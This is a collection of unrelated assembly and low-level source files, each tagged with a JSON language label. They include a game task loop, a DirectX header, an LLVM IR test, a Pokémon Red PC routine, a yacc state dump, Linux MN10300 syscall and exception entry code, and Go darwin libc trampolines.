move rTaskCount,(<RLNumTasks) ; Get Number of Tasks Running
dec rTaskCount ; Any Running Tasks?
bmi _RLDT900
inc rTaskCount
move rTaskPtr,#<_RLTasks ; Pointer to TaskData
;
; >>> HANDLE NEXT TASK <<<
;
_RLDT200
to r9 ; Get TaskCode Address
ldw (rTaskPtr)
inc r9 ; Any CODE Here?
beq _RLDT800 ; No!
;
; >>> CALL TASK CODE <<<
;
link #2 ; Set Return Address
jmp r9 ; Execute TaskCode
nop
_RLDoTasks2
dec rTaskCount ; One More Task Completed
beq _RLDT900 ; No More Tasks to Run!
;
; >>> MOVE TO NEXT TASK <<<
;
_RLDT800
with rTaskPtr ; Move to Next TaskData
add #rlmSize
bra _RLDT200+1
to r9 ; One More Task Completed
;
; >>> FINISHED HANDLING ALL TASKS <<<
;
_RLDT900
ife usePATCH
move r0,#<_RLMSObjects ; HANDLE MOVABLE OBJECTS STATES
endif
ifn usePATCH
move r0,(<PTRLMSObjects) ; HANDLE MOVABLE OBJECTS STATES
endif
move r8,#^_RLMSObjects
ife PROFILE
ljmp r8
endif
ifn PROFILE
stop
endif
nop
| {
"language": "Assembly"
} |
//*********************************************************
//
// Copyright (c) Microsoft. All rights reserved.
// This code is licensed under the MIT License (MIT).
// THIS CODE IS PROVIDED *AS IS* WITHOUT WARRANTY OF
// ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY
// IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR
// PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
//
//*********************************************************
#pragma once
#include <agile.h>
#include <algorithm>
#include <collection.h>
#include <concrt.h>
#include <memory>
#include <ppltasks.h>
#include <shcore.h>
#include <string>
#include <sstream>
#include <wrl.h>
#include <wrl/client.h>
// DirectX
#include <dxgi1_6.h>
#include <d3d11_3.h>
#include <d2d1_3.h>
#include <d2d1effectauthor_1.h>
#include <d2d1effecthelpers.h>
#include <dwrite_3.h>
#include <wincodec.h>
#include <DirectXMath.h>
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=x86_64-darwin -mcpu=corei7 | grep movabsq | count 3
define i64 @constant_hoisting(i64 %o0, i64 %o1, i64 %o2, i64 %o3, i64 %o4, i64 %o5) {
entry:
%l0 = and i64 %o0, -281474976710654
%c0 = icmp ne i64 %l0, 0
br i1 %c0, label %fail, label %bb1
bb1:
%l1 = and i64 %o1, -281474976710654
%c1 = icmp ne i64 %l1, 0
br i1 %c1, label %fail, label %bb2
bb2:
%l2 = and i64 %o2, -281474976710654
%c2 = icmp ne i64 %l2, 0
br i1 %c2, label %fail, label %bb3
bb3:
%l3 = and i64 %o3, -281474976710654
%c3 = icmp ne i64 %l3, 0
br i1 %c3, label %fail, label %bb4
bb4:
%l4 = and i64 %o4, -281474976710653
%c4 = icmp ne i64 %l4, 0
br i1 %c4, label %fail, label %bb5
bb5:
%l5 = and i64 %o5, -281474976710652
%c5 = icmp ne i64 %l5, 0
br i1 %c5, label %fail, label %bb6
bb6:
ret i64 %l5
fail:
ret i64 -1
}
define void @constant_expressions() {
entry:
%0 = load i64* inttoptr (i64 add (i64 51250129900, i64 0) to i64*)
%1 = load i64* inttoptr (i64 add (i64 51250129900, i64 8) to i64*)
%2 = load i64* inttoptr (i64 add (i64 51250129900, i64 16) to i64*)
%3 = load i64* inttoptr (i64 add (i64 51250129900, i64 24) to i64*)
%4 = add i64 %0, %1
%5 = add i64 %2, %3
%6 = add i64 %4, %5
store i64 %6, i64* inttoptr (i64 add (i64 51250129900, i64 0) to i64*)
ret void
}
define void @constant_expressions2() {
entry:
%0 = load i64* inttoptr (i64 51250129900 to i64*)
%1 = load i64* inttoptr (i64 51250129908 to i64*)
%2 = load i64* inttoptr (i64 51250129916 to i64*)
%3 = load i64* inttoptr (i64 51250129924 to i64*)
%4 = add i64 %0, %1
%5 = add i64 %2, %3
%6 = add i64 %4, %5
store i64 %6, i64* inttoptr (i64 51250129900 to i64*)
ret void
}
| {
"language": "Assembly"
} |
; Handle the player using Oak's PC: show the greeting, offer a Pokédex
; rating, and restore the screen on exit.
OpenOaksPC:
call SaveScreenTilesToBuffer2 ; save screen so it can be restored below
ld hl, AccessedOaksPCText
call PrintText
ld hl, GetDexRatedText
call PrintText
call YesNoChoice ; result goes to wCurrentMenuItem (0 = yes)
ld a, [wCurrentMenuItem]
and a
jr nz, .closePC ; player chose "no" — skip the rating
predef DisplayDexRating
.closePC
ld hl, ClosedOaksPCText
call PrintText
jp LoadScreenTilesFromBuffer2 ; restore screen; tail call, returns to caller
GetDexRatedText:
TX_FAR _GetDexRatedText
db "@"
ClosedOaksPCText:
TX_FAR _ClosedOaksPCText
TX_WAIT
db "@"
AccessedOaksPCText:
TX_FAR _AccessedOaksPCText
db "@"
| {
"language": "Assembly"
} |
0 $accept : S $end
1 S : error
state 0
$accept : . S $end (0)
error shift 1
. error
S goto 2
state 1
S : error . (1)
. reduce 1
state 2
$accept : S . $end (0)
$end accept
5 terminals, 2 nonterminals
2 grammar rules, 3 states
grammar parser grammar
symbol# value# symbol
0 0 $end
1 256 error
2 40 '('
3 42 '*'
4 38 '&'
5 257 $accept
6 258 S
| {
"language": "Assembly"
} |
###############################################################################
#
# MN10300 Exception and interrupt entry points
#
# Copyright (C) 2007 Matsushita Electric Industrial Co., Ltd.
# Copyright (C) 2007 Red Hat, Inc. All Rights Reserved.
# Modified by David Howells ([email protected])
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public Licence
# as published by the Free Software Foundation; either version
# 2 of the Licence, or (at your option) any later version.
#
###############################################################################
#include <linux/sys.h>
#include <linux/linkage.h>
#include <asm/smp.h>
#include <asm/irqflags.h>
#include <asm/thread_info.h>
#include <asm/intctl-regs.h>
#include <asm/busctl-regs.h>
#include <asm/timer-regs.h>
#include <unit/leds.h>
#include <asm/page.h>
#include <asm/pgtable.h>
#include <asm/errno.h>
#include <asm/asm-offsets.h>
#include <asm/frame.inc>
#if defined(CONFIG_SMP) && defined(CONFIG_GDBSTUB)
#include <asm/gdb-stub.h>
#endif /* CONFIG_SMP && CONFIG_GDBSTUB */
#ifdef CONFIG_PREEMPT
#define preempt_stop LOCAL_IRQ_DISABLE
#else
#define preempt_stop
#define resume_kernel restore_all
#endif
.am33_2
###############################################################################
#
# the return path for a forked child
# - on entry, D0 holds the address of the previous task to run
#
###############################################################################
ENTRY(ret_from_fork)
call schedule_tail[],0 # finish the context switch (D0 = previous task)
GET_THREAD_INFO a2
# return 0 to indicate child process
clr d0
mov d0,(REG_D0,fp) # child's syscall return value = 0
jmp syscall_exit
###############################################################################
#
# system call handler
#
###############################################################################
ENTRY(system_call)
add -4,sp # open a slot for ORIG_D0
SAVE_ALL
mov d0,(REG_ORIG_D0,fp) # keep the syscall number for tracing/restart
GET_THREAD_INFO a2
cmp nr_syscalls,d0
bcc syscall_badsys # number out of range -> -ENOSYS
btst _TIF_SYSCALL_TRACE,(TI_flags,a2)
bne syscall_entry_trace # ptrace entry hook wanted
syscall_call:
add d0,d0,a1 # a1 = syscall nr * 2
add a1,a1 # a1 = syscall nr * 4 (table of .longs)
mov (REG_A0,fp),d0 # reload d0 (it held the syscall nr) from the frame
mov (sys_call_table,a1),a0 # fetch the handler address
calls (a0)
mov d0,(REG_D0,fp) # store the return value into the frame
syscall_exit:
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
mov (TI_flags,a2),d2
btst _TIF_ALLWORK_MASK,d2
bne syscall_exit_work # pending work before returning to userspace
restore_all:
RESTORE_ALL
###############################################################################
#
# perform work that needs to be done immediately before resumption and syscall
# tracing
#
###############################################################################
ALIGN
syscall_exit_work:
btst _TIF_SYSCALL_TRACE,d2
beq work_pending # not tracing - go handle the other work bits
LOCAL_IRQ_ENABLE # could let syscall_trace_exit() call
# schedule() instead
mov fp,d0 # arg 0: register frame
call syscall_trace_exit[],0 # do_syscall_trace(regs)
jmp resume_userspace
ALIGN
work_pending:
btst _TIF_NEED_RESCHED,d2
beq work_notifysig # no reschedule wanted - check signals
work_resched:
call schedule[],0
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
# is there any work to be done other than syscall tracing?
mov (TI_flags,a2),d2
btst _TIF_WORK_MASK,d2
beq restore_all # nothing left to do
btst _TIF_NEED_RESCHED,d2
bne work_resched # a reschedule request raced in
# deal with pending signals and notify-resume requests
work_notifysig:
mov fp,d0 # arg 0: register frame
mov d2,d1 # arg 1: thread_info flags
call do_notify_resume[],0
jmp resume_userspace
# perform syscall entry tracing
syscall_entry_trace:
mov -ENOSYS,d0
mov d0,(REG_D0,fp) # default return value if the call isn't dispatched
mov fp,d0
call syscall_trace_entry[],0 # returns the syscall number to actually use
mov (REG_D1,fp),d1
cmp nr_syscalls,d0
bcs syscall_call # number valid - dispatch it
jmp syscall_exit # invalid - return the -ENOSYS stored above
# invalid syscall number: hand -ENOSYS back to userspace
syscall_badsys:
mov -ENOSYS,d0
mov d0,(REG_D0,fp)
jmp resume_userspace
# userspace resumption stub bypassing syscall exit tracing
.globl ret_from_exception, ret_from_intr
ALIGN
ret_from_exception:
preempt_stop # IRQs off first if CONFIG_PREEMPT (expands to nothing otherwise)
ret_from_intr:
GET_THREAD_INFO a2
mov (REG_EPSW,fp),d0 # need to deliver signals before
# returning to userspace
and EPSW_nSL,d0 # were we interrupted in supervisor mode?
beq resume_kernel # returning to supervisor mode
ENTRY(resume_userspace)
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
# is there any work to be done on int/exception return?
mov (TI_flags,a2),d2
btst _TIF_WORK_MASK,d2
bne work_pending
jmp restore_all
#ifdef CONFIG_PREEMPT
# kernel-mode resumption: preempt the kernel if it is safe to do so
ENTRY(resume_kernel)
LOCAL_IRQ_DISABLE
mov (TI_preempt_count,a2),d0 # non-zero preempt_count ?
cmp 0,d0
bne restore_all # preemption currently disabled
need_resched:
btst _TIF_NEED_RESCHED,(TI_flags,a2)
beq restore_all # no reschedule requested
mov (REG_EPSW,fp),d0
and EPSW_IM,d0
cmp EPSW_IM_7,d0 # interrupts off (exception path) ?
bne restore_all
call preempt_schedule_irq[],0
jmp need_resched # recheck: another reschedule may be pending
#endif
###############################################################################
#
# IRQ handler entry point
# - intended to be entered at multiple priorities
#
###############################################################################
ENTRY(irq_handler)
add -4,sp # open a slot for ORIG_D0
SAVE_ALL
# it's not a syscall: mark ORIG_D0 as invalid (-1)
mov 0xffffffff,d0
mov d0,(REG_ORIG_D0,fp)
mov fp,d0 # arg 0: register frame
call do_IRQ[],0 # do_IRQ(regs)
jmp ret_from_intr
###############################################################################
#
# Double Fault handler entry point
# - note that there will not be a stack, D0/A0 will hold EPSW/PC as were
#
###############################################################################
# dedicated emergency stack: the normal stack is unusable in a double fault
.section .bss
.balign THREAD_SIZE
.space THREAD_SIZE
__df_stack:
.previous
ENTRY(double_fault)
mov a0,(__df_stack-4) # PC as was
mov d0,(__df_stack-8) # EPSW as was
mn10300_set_dbfleds # display 'db-f' on the LEDs
mov 0xaa55aa55,d0 # recognisable poison value
mov d0,(__df_stack-12) # no ORIG_D0
mov sp,a0 # save corrupted SP
mov __df_stack-12,sp # emergency supervisor stack
SAVE_ALL
mov a0,(REG_A0,fp) # save corrupted SP as A0 (which got
# clobbered by the CPU)
mov fp,d0 # arg 0: register frame
calls do_double_fault
double_fault_loop:
bra double_fault_loop # unrecoverable; spin forever
###############################################################################
#
# Bus Error handler entry point
# - handle external (async) bus errors separately
#
###############################################################################
ENTRY(raw_bus_error)
add -4,sp
mov d0,(sp) # preserve d0 whilst we probe the cause
#if defined(CONFIG_ERRATUM_NEED_TO_RELOAD_MMUCTR)
mov (MMUCTR),d0 # erratum workaround: read back and rewrite MMUCTR
mov d0,(MMUCTR)
#endif
mov (BCBERR),d0 # what
btst BCBERR_BEMR_DMA,d0 # see if it was an external bus error
beq __common_exception_aux # it wasn't
SAVE_ALL
mov (BCBEAR),d1 # destination of erroneous access
mov (REG_ORIG_D0,fp),d2
mov d2,(REG_D0,fp) # put the preserved d0 back in its proper frame slot
mov -1,d2
mov d2,(REG_ORIG_D0,fp) # mark frame as "not a syscall"
add -4,sp
mov fp,(12,sp) # frame pointer
call io_bus_error[],0
jmp restore_all
###############################################################################
#
# NMI exception entry points
#
# This is used by ordinary interrupt channels that have the GxICR_NMI bit set
# in addition to the main NMI and Watchdog channels. SMP NMI IPIs use this
# facility.
#
###############################################################################
ENTRY(nmi_handler)
add -4,sp
mov d0,(sp) # preserve d0
mov (TBR),d0 # d0 = exception code from the TBR
#ifdef CONFIG_SMP
add -4,sp
mov d0,(sp) # save d0(TBR)
movhu (NMIAGR),d0 # identify the NMI source channel
and NMIAGR_GN,d0
lsr 0x2,d0
cmp CALL_FUNCTION_NMI_IPI,d0
bne nmi_not_smp_callfunc # if not call function, jump
# function call nmi ipi
add 4,sp # no need to store TBR
mov GxICR_DETECT,d0 # clear NMI request
movbu d0,(GxICR(CALL_FUNCTION_NMI_IPI))
movhu (GxICR(CALL_FUNCTION_NMI_IPI)),d0 # read back (presumably flushes the write)
and ~EPSW_NMID,epsw # enable NMI
mov (sp),d0 # restore d0
SAVE_ALL
call smp_nmi_call_function_interrupt[],0
RESTORE_ALL
nmi_not_smp_callfunc:
#ifdef CONFIG_KERNEL_DEBUGGER
cmp DEBUGGER_NMI_IPI,d0
bne nmi_not_debugger # if not kernel debugger NMI IPI, jump
# kernel debugger NMI IPI
add 4,sp # no need to store TBR
mov GxICR_DETECT,d0 # clear NMI
movbu d0,(GxICR(DEBUGGER_NMI_IPI))
movhu (GxICR(DEBUGGER_NMI_IPI)),d0 # read back (presumably flushes the write)
and ~EPSW_NMID,epsw # enable NMI
mov (sp),d0 # restore d0
SAVE_ALL
mov fp,d0 # arg 0: stacked register file
mov a2,d1 # arg 1: exception number
call debugger_nmi_interrupt[],0
RESTORE_ALL
nmi_not_debugger:
#endif /* CONFIG_KERNEL_DEBUGGER */
mov (sp),d0 # restore TBR to d0
add 4,sp
#endif /* CONFIG_SMP */
bra __common_exception_nonmi # entry point that skips the IRQ/NMI re-enable
###############################################################################
#
# General exception entry point
#
###############################################################################
ENTRY(__common_exception)
add -4,sp
mov d0,(sp) # preserve d0
#if defined(CONFIG_ERRATUM_NEED_TO_RELOAD_MMUCTR)
mov (MMUCTR),d0 # erratum workaround: read back and rewrite MMUCTR
mov d0,(MMUCTR)
#endif
__common_exception_aux:
mov (TBR),d0 # d0 = exception code
and ~EPSW_NMID,epsw # turn NMIs back on if not NMI
or EPSW_IE,epsw # ...and ordinary interrupts too
__common_exception_nonmi:
and 0x0000FFFF,d0 # turn the exception code into a vector
# table index
btst 0x00000007,d0 # the code must have its low 3 bits clear...
bne 1f
cmp 0x00000400,d0 # ...and lie below 0x400
bge 1f
SAVE_ALL # build the stack frame
mov (REG_D0,fp),a2 # get the exception number
mov (REG_ORIG_D0,fp),d0
mov d0,(REG_D0,fp) # put the preserved d0 back in its proper frame slot
mov -1,d0
mov d0,(REG_ORIG_D0,fp) # mark frame as "not a syscall"
#ifdef CONFIG_GDBSTUB
#ifdef CONFIG_SMP
call gdbstub_busy_check[],0
and d0,d0 # check return value
beq 2f
#else /* CONFIG_SMP */
btst 0x01,(gdbstub_busy)
beq 2f
#endif /* CONFIG_SMP */
# the stub was already running - report the exception to it directly
and ~EPSW_IE,epsw
mov fp,d0
mov a2,d1
call gdbstub_exception[],0 # gdbstub itself caused an exception
bra restore_all
2:
#endif /* CONFIG_GDBSTUB */
mov fp,d0 # arg 0: stacked register file
mov a2,d1 # arg 1: exception number
lsr 1,a2 # code/2 = byte offset into exception_table of .longs
mov (exception_table,a2),a2
calls (a2)
jmp ret_from_exception
1: pi # BUG() equivalent
###############################################################################
#
# Exception handler functions table
#
###############################################################################
.data
ENTRY(exception_table)
.rept 0x400>>1 # fill every slot with the default handler
.long uninitialised_exception
.endr
.previous
###############################################################################
#
# Change an entry in the exception table
# - D0 exception code, D1 handler
#
###############################################################################
ENTRY(set_excp_vector)
lsr 1,d0 # code/2 = byte offset into the table (matches the dispatch above)
add exception_table,d0
mov d1,(d0) # install the new handler
mov 4,d1 # NOTE(review): purpose of d1=4 on return is unclear - confirm
ret [],0
###############################################################################
#
# System call table
#
###############################################################################
.data
ENTRY(sys_call_table)
.long sys_restart_syscall /* 0 */
.long sys_exit
.long sys_fork
.long sys_read
.long sys_write
.long sys_open /* 5 */
.long sys_close
.long sys_waitpid
.long sys_creat
.long sys_link
.long sys_unlink /* 10 */
.long sys_execve
.long sys_chdir
.long sys_time
.long sys_mknod
.long sys_chmod /* 15 */
.long sys_lchown16
.long sys_ni_syscall /* old break syscall holder */
.long sys_stat
.long sys_lseek
.long sys_getpid /* 20 */
.long sys_mount
.long sys_oldumount
.long sys_setuid16
.long sys_getuid16
.long sys_stime /* 25 */
.long sys_ptrace
.long sys_alarm
.long sys_fstat
.long sys_pause
.long sys_utime /* 30 */
.long sys_ni_syscall /* old stty syscall holder */
.long sys_ni_syscall /* old gtty syscall holder */
.long sys_access
.long sys_nice
.long sys_ni_syscall /* 35 - old ftime syscall holder */
.long sys_sync
.long sys_kill
.long sys_rename
.long sys_mkdir
.long sys_rmdir /* 40 */
.long sys_dup
.long sys_pipe
.long sys_times
.long sys_ni_syscall /* old prof syscall holder */
.long sys_brk /* 45 */
.long sys_setgid16
.long sys_getgid16
.long sys_signal
.long sys_geteuid16
.long sys_getegid16 /* 50 */
.long sys_acct
.long sys_umount /* recycled never used phys() */
.long sys_ni_syscall /* old lock syscall holder */
.long sys_ioctl
.long sys_fcntl /* 55 */
.long sys_ni_syscall /* old mpx syscall holder */
.long sys_setpgid
.long sys_ni_syscall /* old ulimit syscall holder */
.long sys_ni_syscall /* old sys_olduname */
.long sys_umask /* 60 */
.long sys_chroot
.long sys_ustat
.long sys_dup2
.long sys_getppid
.long sys_getpgrp /* 65 */
.long sys_setsid
.long sys_sigaction
.long sys_sgetmask
.long sys_ssetmask
.long sys_setreuid16 /* 70 */
.long sys_setregid16
.long sys_sigsuspend
.long sys_sigpending
.long sys_sethostname
.long sys_setrlimit /* 75 */
.long sys_old_getrlimit
.long sys_getrusage
.long sys_gettimeofday
.long sys_settimeofday
.long sys_getgroups16 /* 80 */
.long sys_setgroups16
.long sys_old_select
.long sys_symlink
.long sys_lstat
.long sys_readlink /* 85 */
.long sys_uselib
.long sys_swapon
.long sys_reboot
.long sys_old_readdir
.long old_mmap /* 90 */
.long sys_munmap
.long sys_truncate
.long sys_ftruncate
.long sys_fchmod
.long sys_fchown16 /* 95 */
.long sys_getpriority
.long sys_setpriority
.long sys_ni_syscall /* old profil syscall holder */
.long sys_statfs
.long sys_fstatfs /* 100 */
.long sys_ni_syscall /* ioperm */
.long sys_socketcall
.long sys_syslog
.long sys_setitimer
.long sys_getitimer /* 105 */
.long sys_newstat
.long sys_newlstat
.long sys_newfstat
.long sys_ni_syscall /* old sys_uname */
.long sys_ni_syscall /* 110 - iopl */
.long sys_vhangup
.long sys_ni_syscall /* old "idle" system call */
.long sys_ni_syscall /* vm86old */
.long sys_wait4
.long sys_swapoff /* 115 */
.long sys_sysinfo
.long sys_ipc
.long sys_fsync
.long sys_sigreturn
.long sys_clone /* 120 */
.long sys_setdomainname
.long sys_newuname
.long sys_ni_syscall /* modify_ldt */
.long sys_adjtimex
.long sys_mprotect /* 125 */
.long sys_sigprocmask
.long sys_ni_syscall /* old "create_module" */
.long sys_init_module
.long sys_delete_module
.long sys_ni_syscall /* 130: old "get_kernel_syms" */
.long sys_quotactl
.long sys_getpgid
.long sys_fchdir
.long sys_bdflush
.long sys_sysfs /* 135 */
.long sys_personality
.long sys_ni_syscall /* reserved for afs_syscall */
.long sys_setfsuid16
.long sys_setfsgid16
.long sys_llseek /* 140 */
.long sys_getdents
.long sys_select
.long sys_flock
.long sys_msync
.long sys_readv /* 145 */
.long sys_writev
.long sys_getsid
.long sys_fdatasync
.long sys_sysctl
.long sys_mlock /* 150 */
.long sys_munlock
.long sys_mlockall
.long sys_munlockall
.long sys_sched_setparam
.long sys_sched_getparam /* 155 */
.long sys_sched_setscheduler
.long sys_sched_getscheduler
.long sys_sched_yield
.long sys_sched_get_priority_max
.long sys_sched_get_priority_min /* 160 */
.long sys_sched_rr_get_interval
.long sys_nanosleep
.long sys_mremap
.long sys_setresuid16
.long sys_getresuid16 /* 165 */
.long sys_ni_syscall /* vm86 */
.long sys_ni_syscall /* Old sys_query_module */
.long sys_poll
.long sys_ni_syscall /* was nfsservctl */
.long sys_setresgid16 /* 170 */
.long sys_getresgid16
.long sys_prctl
.long sys_rt_sigreturn
.long sys_rt_sigaction
.long sys_rt_sigprocmask /* 175 */
.long sys_rt_sigpending
.long sys_rt_sigtimedwait
.long sys_rt_sigqueueinfo
.long sys_rt_sigsuspend
.long sys_pread64 /* 180 */
.long sys_pwrite64
.long sys_chown16
.long sys_getcwd
.long sys_capget
.long sys_capset /* 185 */
.long sys_sigaltstack
.long sys_sendfile
.long sys_ni_syscall /* reserved for streams1 */
.long sys_ni_syscall /* reserved for streams2 */
.long sys_vfork /* 190 */
.long sys_getrlimit
.long sys_mmap_pgoff
.long sys_truncate64
.long sys_ftruncate64
.long sys_stat64 /* 195 */
.long sys_lstat64
.long sys_fstat64
.long sys_lchown
.long sys_getuid
.long sys_getgid /* 200 */
.long sys_geteuid
.long sys_getegid
.long sys_setreuid
.long sys_setregid
.long sys_getgroups /* 205 */
.long sys_setgroups
.long sys_fchown
.long sys_setresuid
.long sys_getresuid
.long sys_setresgid /* 210 */
.long sys_getresgid
.long sys_chown
.long sys_setuid
.long sys_setgid
.long sys_setfsuid /* 215 */
.long sys_setfsgid
.long sys_pivot_root
.long sys_mincore
.long sys_madvise
.long sys_getdents64 /* 220 */
.long sys_fcntl64
.long sys_ni_syscall /* reserved for TUX */
.long sys_ni_syscall
.long sys_gettid
.long sys_readahead /* 225 */
.long sys_setxattr
.long sys_lsetxattr
.long sys_fsetxattr
.long sys_getxattr
.long sys_lgetxattr /* 230 */
.long sys_fgetxattr
.long sys_listxattr
.long sys_llistxattr
.long sys_flistxattr
.long sys_removexattr /* 235 */
.long sys_lremovexattr
.long sys_fremovexattr
.long sys_tkill
.long sys_sendfile64
.long sys_futex /* 240 */
.long sys_sched_setaffinity
.long sys_sched_getaffinity
.long sys_ni_syscall /* sys_set_thread_area */
.long sys_ni_syscall /* sys_get_thread_area */
.long sys_io_setup /* 245 */
.long sys_io_destroy
.long sys_io_getevents
.long sys_io_submit
.long sys_io_cancel
.long sys_fadvise64 /* 250 */
.long sys_ni_syscall
.long sys_exit_group
.long sys_lookup_dcookie
.long sys_epoll_create
.long sys_epoll_ctl /* 255 */
.long sys_epoll_wait
.long sys_remap_file_pages
.long sys_set_tid_address
.long sys_timer_create
.long sys_timer_settime /* 260 */
.long sys_timer_gettime
.long sys_timer_getoverrun
.long sys_timer_delete
.long sys_clock_settime
.long sys_clock_gettime /* 265 */
.long sys_clock_getres
.long sys_clock_nanosleep
.long sys_statfs64
.long sys_fstatfs64
.long sys_tgkill /* 270 */
.long sys_utimes
.long sys_fadvise64_64
.long sys_ni_syscall /* sys_vserver */
.long sys_mbind
.long sys_get_mempolicy /* 275 */
.long sys_set_mempolicy
.long sys_mq_open
.long sys_mq_unlink
.long sys_mq_timedsend
.long sys_mq_timedreceive /* 280 */
.long sys_mq_notify
.long sys_mq_getsetattr
.long sys_kexec_load
.long sys_waitid
.long sys_ni_syscall /* 285 */ /* available */
.long sys_add_key
.long sys_request_key
.long sys_keyctl
.long sys_cacheflush
.long sys_ioprio_set /* 290 */
.long sys_ioprio_get
.long sys_inotify_init
.long sys_inotify_add_watch
.long sys_inotify_rm_watch
.long sys_migrate_pages /* 295 */
.long sys_openat
.long sys_mkdirat
.long sys_mknodat
.long sys_fchownat
.long sys_futimesat /* 300 */
.long sys_fstatat64
.long sys_unlinkat
.long sys_renameat
.long sys_linkat
.long sys_symlinkat /* 305 */
.long sys_readlinkat
.long sys_fchmodat
.long sys_faccessat
.long sys_pselect6
.long sys_ppoll /* 310 */
.long sys_unshare
.long sys_set_robust_list
.long sys_get_robust_list
.long sys_splice
.long sys_sync_file_range /* 315 */
.long sys_tee
.long sys_vmsplice
.long sys_move_pages
.long sys_getcpu
.long sys_epoll_pwait /* 320 */
.long sys_utimensat
.long sys_signalfd
.long sys_timerfd_create
.long sys_eventfd
.long sys_fallocate /* 325 */
.long sys_timerfd_settime
.long sys_timerfd_gettime
.long sys_signalfd4
.long sys_eventfd2
.long sys_epoll_create1 /* 330 */
.long sys_dup3
.long sys_pipe2
.long sys_inotify_init1
.long sys_preadv
.long sys_pwritev /* 335 */
.long sys_rt_tgsigqueueinfo
.long sys_perf_event_open
.long sys_recvmmsg
.long sys_setns
nr_syscalls=(.-sys_call_table)/4
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go arm
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
